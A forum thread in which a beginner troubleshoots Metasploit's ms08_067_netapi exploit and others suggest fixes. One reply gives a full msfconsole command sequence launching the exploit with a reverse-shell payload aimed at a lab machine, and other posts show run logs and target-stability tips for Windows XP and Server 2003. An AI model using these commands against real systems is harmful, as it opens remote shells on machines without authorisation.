Thread: Metasploit ms08_067_netapi question

  1. #1
    Junior Member imported_apprentice's Avatar
    Join Date
    Aug 2008
    Posts
    30

    Default Metasploit ms08_067_netapi question

    Hey guys, I would like to know: if you use this exploit and it gets up to
    "Triggering the vulnerability" and just stays like that (it isn't frozen, nothing happens), should I just wait, run it again, or try something else?
    Thanks

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by apprentice
    Hey guys, I would like to know: if you use this exploit and it gets up to
    "Triggering the vulnerability" and just stays like that (it isn't frozen, nothing happens), should I just wait, run it again, or try something else?
    Thanks

    Why not try all three?
    Furthermore, what is your target box? Are you sure that you have met all of the conditions to make the exploit work? What exact commands did you use?
    These are some details that will help us to help you.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  3. #3
    Moderator
    Join Date
    Jan 2010
    Posts
    167

    Default

    Quote Originally Posted by archangel.amael
    Furthermore what is your target box?

    ms08_067 is also quite unstable for some targets like win2k3 server, so you have to play a bit with it.

    m-1-k-3

  4. #4
    Junior Member imported_apprentice's Avatar
    Join Date
    Aug 2008
    Posts
    30

    Default

    Thanks for your reply guys. Well, I'm using msfgui; when I execute the module I select auto targeting, my payload is windows/shell/reverse_tcp and the RHOST is the IP, then I execute it. This is the message in the output box:

    20:26:42 - ms08_067_netapi[*] Launching exploit windows/smb/ms08_067_netapi...
    20:26:43 - ms08_067_netapi[*] Started reverse handler on port 4444
    20:26:44 - ms08_067_netapi[*] Automatically detecting the target...
    20:26:47 - ms08_067_netapi[*] Fingerprint: Windows XP Service Pack 3 - lang:English
    20:26:47 - ms08_067_netapi[*] Selected Target: Windows XP SP3 English (NX)
    20:26:47 - ms08_067_netapi[*] Triggering the vulnerability..

    I guess maybe I watched too many tuts and followed what they are doing instead of why they are doing it. Any guidance will be appreciated.

  5. #5
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    Lose the GUI, grab an unpatched XP install, then do like so, assuming 192.168.1.100 is the box and 192.168.1.200 is you with port 9999 open.

    ./msfconsole
    use windows/smb/ms08_067_netapi
    set rhost 192.168.1.100
    set payload windows/shell_reverse_tcp
    set lhost 192.168.1.200
    set lport 9999
    exploit

    enjoy!

    @m-1-k-3
    Actually, this is one of the most stable exploits.

    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  6. #6
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by m-1-k-3
    ms08_067 is also quite unstable for some targets like win2k3 server, so you have to play a bit with it.

    m-1-k-3

    Actually I used win2k3 the first time I followed the tutorial here on using the above. Maybe it was luck or whatever but I didn't have any problems with it at all.

    @OP there is a guide here by pureh@te on messing around with this exploit.

  7. #7
    Junior Member imported_apprentice's Avatar
    Join Date
    Aug 2008
    Posts
    30

    Default

    Thanks, I will give it a go. Should I change the default port to 9999 even if that port is not open? Do you use windows/shell_reverse_tcp or windows/shell/reverse_tcp as the payload? Thanks

  8. #8
    Moderator
    Join Date
    Jan 2010
    Posts
    167

    Default

    Quote Originally Posted by vvpalin
    @m-1-k-3
    Actually, this is one of the most stable exploits.

    Have you checked it out on win2k3 server?

    m-1-k-3

  9. #9
    Moderator
    Join Date
    Jan 2010
    Posts
    167

    Default

    Quote Originally Posted by archangel.amael
    Actually I used win2k3 the first time I followed the tutorial here on using the above. Maybe it was luck or whatever but I didn't have any problems with it at all.

    If you have a win2k3 server with NX you will get problems; without NX it is working quite smoothly ...

    m-1-k-3

  10. #10
    Junior Member imported_apprentice's Avatar
    Join Date
    Aug 2008
    Posts
    30

    Default

    OK thanks, will give it a go.
